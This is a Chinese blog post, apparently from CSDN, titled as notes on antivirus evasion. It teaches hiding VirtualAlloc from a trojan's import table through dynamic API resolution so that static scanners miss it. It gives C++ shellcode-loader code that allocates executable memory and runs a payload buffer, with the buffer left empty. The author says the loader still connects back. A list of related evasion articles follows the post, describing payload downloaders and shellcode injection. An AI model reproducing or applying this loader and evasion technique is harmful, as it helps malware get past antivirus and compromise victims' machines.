免杀笔记 ----> 动态调用

于 2024-07-14 14:37:17 发布
阅读量453 收藏 8
点赞数 7
文章标签: 绕AV 免杀 动态调用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huohaowen/article/details/140413972
版权

前一段时间不是说要进行IAT表的隐藏吗,终于给我逮到时间来写了,今天就来先将最简单的一种方式  ----> 动态调用!!!    

1.静态查杀

这里还是说一下我们为什么要对他进行隐藏呢???  首先就是我们的杀软规则

  ::我的静态查杀很强

对于杀软,像上面说的赛门铁克,它的静态查杀就很强!!  而他们又是怎么静态查杀的呢??? 

IAT表    (还记不记得我以前说这个玩意在免杀里面很重要!!!)

我们自己随便拉一个简单的木马看看导入表,我们的导入表里面是能看见我们所用的WindowsAPI的,其中像这种 VirtualAlloc ,OpenProcess ,CreateThread 这种被查杀到就基本等死

这时候就有意思了,我们来看看Chrome这个exe的导入表

这么多危险函数,这不应该直接给他杀死??(我的马都没这么多危险函数)

   ::区别对待是吧。。。。。

但是你也不看看人家是什么exe,人家是微软的EXE啊!! 有数字签名的!!!

对于这种有数字签名的,它无论使用多么危险的函数,强如赛门铁克也是拿他没办法的!

那么我们又没办法拿到这个签名,我们应该怎么去免杀呢??  

  1. 加壳 ,通过加壳我们可以实现导入一个假的IAT表
  2. 动态调用 ,其实就是在Ring3层对函数进行重写

2.动态调用

那么下面,我们就来讲一下我们的动态调用的用法。

我们先最简单的贴出来一段Loader

#include<iostream>
#include<Windows.h>
using namespace std;
/* length: 891 bytes */
char buf[] = "";
int main()
{
    void * p = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(p, buf, sizeof(buf));
	((void(*)())p)();
	return 0;
}

首先我们去看他的导入表,我们要去隐藏掉这个显眼包!!!

该怎么做呢,我们点进去这个函数

然后我们将这一段复制出来

LPVOID
WINAPI
VirtualAlloc(
    _In_opt_ LPVOID lpAddress,
    _In_     SIZE_T dwSize,
    _In_     DWORD flAllocationType,
    _In_     DWORD flProtect
    )

 然后我们这样写

LPVOID  新的函数的名字(
    _In_opt_ LPVOID lpAddress,
    _In_     SIZE_T dwSize,
    _In_     DWORD flAllocationType,
    _In_     DWORD flProtect
    )
{
}

然后我们在中括号中先这样写

加了个括号,加了个TYEPDEF,并且将VirtualAlloc 改成了 *FN_VirtualAlloc

typedef LPVOID (WINAPI *FN_VirtualAlloc)(
    _In_opt_ LPVOID lpAddress,
    _In_     SIZE_T dwSize,
    _In_     DWORD flAllocationType,
    _In_     DWORD flProtect
    )

然后我们去获取函数的HMODULE(是不是感觉有点熟悉,我们之前也在写DLL注入里面用过)

并且接收它(这个类型是Fn_Virtualloc,不是我们的Hide_VirtualAlloc!!)

HMODULE VirtualAllocHandle = GetModuleHandleW(L"Kernel32.dll");
Fn_VirtualAlloc ptr = (Fn_VirtualAlloc)GetProcAddress(VirtualAlocHandle,"VirtuallAlloc");

然后照猫画虎的返回就是了

  return ptr(lpAddress, dwSize, flAllocationType, flProtect);

然后我们就能在我们的函数中直接进行调用了!!!!!

#include<iostream>
#include<Windows.h>
using namespace std;
/* length: 891 bytes */
/* length: 891 bytes */
unsigned char buf[] = "";



LPVOID  Hide_VirtualAlloc(
    _In_opt_ LPVOID lpAddress,
    _In_     SIZE_T dwSize,
    _In_     DWORD flAllocationType,
    _In_     DWORD flProtect
)
{
    typedef LPVOID(WINAPI* Fn_VirtualAlloc)(
        _In_opt_ LPVOID lpAddress,
        _In_     SIZE_T dwSize,
        _In_     DWORD flAllocationType,
        _In_     DWORD flProtect
        );
    HMODULE VirtualAllocHandle = GetModuleHandleW(L"KERNEL32.dll");
    if (VirtualAllocHandle == NULL)
    {
        VirtualAllocHandle = LoadLibraryW(L"KERNEL32.dll");
  
    }
    Fn_VirtualAlloc ptr = (Fn_VirtualAlloc)GetProcAddress(VirtualAllocHandle,"VirtualAlloc");
    return ptr(lpAddress, dwSize, flAllocationType, flProtect);

}
int main()
{
    void * p = Hide_VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(p, buf, sizeof(buf));
	((void(*)())p)();
	return 0;
}

这时候我们再上线,发现是能成功上线的!!!

然后我们再去查看它的导出表,此时的VirtuallAlloc已经是消失了的!

这样,我们就实现了动态调用!!!!

WanKING~~
关注
杀毒与免杀技术详解---白嫖党福音
01-15 1825
0x01 简介 不管是社工钓鱼,还是一句话木马getshell,远控,亦或者是反弹shell,都会遇到杀软waf这些大敌,当然主要还是杀软,因此我们不得不考虑免杀进而实现我们渗透测试目的。 0x02 概念 2.1 免杀类别 简单总结下我知道的免杀类别: 一句话木马狗(我觉得他不应该出现在这里,但为了致敬我学习的第一个免杀,把他放了出来) 文件不落地 shellcode加密 修改源码增加花指令 DLL加载 自定义加载器 指定特定的运行方式 加壳 当然还可以按照大的类别划分 静态扫描免杀
红队免杀培训第二章-使用系统调用http 协议下载恶意载荷
Gamma_lab的博客
03-12 3093
​ 这是红队免杀培训的第二章,后续会继续推出红队免杀培训的一些小tips,等后面把这系列更完了,大家把所有的技术点窜起来一起用,那就是乱杀,上一章说了如何避免申请可执行内存块,执行shellcode,这一章将讲如何使用系统调用下载恶意载荷。 前言: ​ 从杀软的行为分析来看,就拿cs的通信协议来讲,stage 的载荷在行为上是明显比stageless载荷多很多的,其中不免一些通信协议的特征,分析过的都知道,stage只是个前置载荷,后续会下更大的功能更全的载荷,因为之前做免杀卡巴的时候就注意到
C++源代码免杀之函数的动态调用
04-28
C++源代码免杀之函数的动态调用 最近也在学着修改Gh0st远控的源代码,源代码免杀起来还是方便、简单、有效和简单点。针对于输入输出表盯的比较紧的杀毒软件,最有效的还是进行函数动态调用。也就是说找到函数的原定义,包括值类型和参数等等,再在调用该函数的地方重新定义这个函数,其实也只是改下函数名而已,下面举个例子:
免杀小方法-释放不完整的动态库文件
冷风
02-20 1355
<br />1.从自身资源释放不完整的动态库文件AA.temp 和 BB.temp到临时目录<br /> <br />2.从自身文件末尾读取标识字段并判断标识的完整性,从自身读取内容修改动态库AA.temp BB.temp使之完整<br /> <br />3.把AA.temp和BB.temp移动到 system32目录 并改名为 msctfime.iem和dbr.ocx<br /> <br />4.创建远程线程把msctfime.iem注入到explorer<br /> <br />5.把 system32
Delphi函数动态调用实现免杀
weixin_30852419的博客
11-21 97
Delphi 源码免杀之函数动态调用实现免杀的下载者自己编译这份代码看看过N多杀软没什么技术含量只是发出来给不懂的人入入门也防止有新人老是来问 ShellApi,URLMon 单元 //Delphi动态调用API函数 procedureTForm1.Button1Click(Sender:TObject); var SourceFile:ansist...
免杀】C2远控-Loader加载器-动态API调用
最新发布
qq_55349490的博客
06-10 561
过杀毒对导入表的检测定性。
[源码]Delphi源码免杀之函数动态调用 实现免杀的下载者
weixin_30437337的博客
03-09 192
[免杀]Delphi源码免杀之函数动态调用 实现免杀的下载者2013-12-30 23:44:21 来源:K8拉登哥哥's Blog 自己编译这份代码看看 过N多杀软 没什么技术含量 只是发出来给不懂的人入入门 也防止有新人老是来问 ShellApi,URLMon 单元 //Delphi动态调用API函数 procedure TForm1.Butto...
2022-2024常用经典免杀技术汇总!
03-27
11. **云免杀**:利用云服务的匿名性和动态性,使得追踪和分析恶意活动变得更加困难。 这份笔记学习资料可能会详细解析这些技术的工作原理、实施步骤以及如何防御。对于网络安全研究人员和从业人员来说,理解和掌握...
JavaWeb(引用--狂神学习笔记)2021-08
煮酒客的博客
09-08 889
狂神学习笔记 1、基本概念(①) 1.1 前言 web开发: web,网页的意思,www.baidu.com· 静态web html,css 提供给所有人看的数据始终不会发生变化! 动态web 淘宝,几乎是所有的网站; 提供给所有人看的数据始终会发生变化,每个人在不同的时间,不同的地点看到的信息各不相同! 技术栈:Servlet/JSP,ASP,PHP 1.2 web应用程序web应用程序: 可以提供浏览器访问的程序; a.html、b.html.….多个web资源,这些web资源可以被外界访问,对外界提供
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1251
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
由函数指针变量组成的数组(实现免杀动态调用的基础)
byteway的专栏
12-11 1266
C 语言使用由函数指针变量组成的数组, 简单模拟虚函数表调用方式
Python常见的免杀方式
m0_62207482的博客
02-09 1349
使用pyinstaller生成的可执行文件 本身就具有一定的免杀能力,但是在与杀毒软件对抗时,部分杀毒软件也可以通 过分析可执行文件的内容来判断文件是否为恶意程序,导致这些代码仍然具有被 杀的可能。·BackDoor-factory工具,又称后门工厂(BDF),利用该工具,可以在不破 坏原来的可执行文件功能的前提下,在代码中注入恶意的shellcode攻击代码。一部分杀毒软件的API拦截操作是通过对API的前几个字节内容的 监测实现的,如果跳过了头部字节,就可以避开这种拦截方式。· 未导出API
[免杀学习]MSF框架分析之Windows Api调用
qq_42585535的博客
09-28 192
MSF中用于windows x86平台的Shellcode模块metasploit-framework/external/source/shellcode/windows/x86/src/block at master · rapid7/metasploit-framework · GitHub调用任意API的汇编代码metasploit-framework/external/source/shellcode/windows/x86/src/block/block_api.asm at master · r
免杀技术有一套(免杀方法大集结)
hackzkaq的博客
05-23 7284
零基础学黑客,搜索公众号:白帽子左一 00. 概述 什么是免杀?来自百科的注解: 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客免杀攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没有效果,试试就知道了。 01. 简介 免杀大概可以分为两种情况: 二进制的免杀(无源
免杀小结-
ZxC789456302的博客
09-26 5941
先来假设一下报毒过程,对于PE文件的检测,如果在CODE位置存在标志A,在DATA位置存在标志B,在资源位置存在标志C,同时满足这三个条件,那么杀软就会报毒,VirTest工作原理就是要找到引起报毒的最后一个标志,也就是C。最后,终极修改方法,找到访问数据的代码,直接修改代码访问数据的地址,数据也可以放到其他地址了,其实就如同修改源码一样修改,肯定没有修改源码那么容易(见后)。使用ResHacker对文件进行资源操作,找来多个正常软件,将它们的资源加入到自己软件,如图片,版本信息,对话框等。
动态获取API地址
小发猫
06-15 4280
cncpp 动态获取API地址是病毒界和密界中常用的程序设计技术Author: 属于中国破解组织 - xIkUg[BCG][DFCG][OCN][DCM][CZG]Date: 2004-07-28Email: xikug@163.comxIkUgs程序园: http://www.xp-program.comXP-极限编程: http://bbs.xp-program.com一点理论,Win32系
详谈 vc++源码免杀全套思路方法
immortal_mcl的专栏
09-10 6823
首先说中国国内杀毒软件的特征 。 1  金山毒霸 ,我个人觉得杀的代码部分和字符串还是比较普遍的 。输入表函数 我个人不多见 。 2  瑞星 ,经实战经验 ,瑞星杀毒软件是垃圾。 过掉金山 也就过瑞星了  除非杀敏感的字符串 。 3  江民 ,纯属基本就是杀字符串 。。 大家可以进行 隐藏代码 就可以。。你懂得 4  也就是大家最头疼的  360杀毒 。这个就是重点。因为过
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值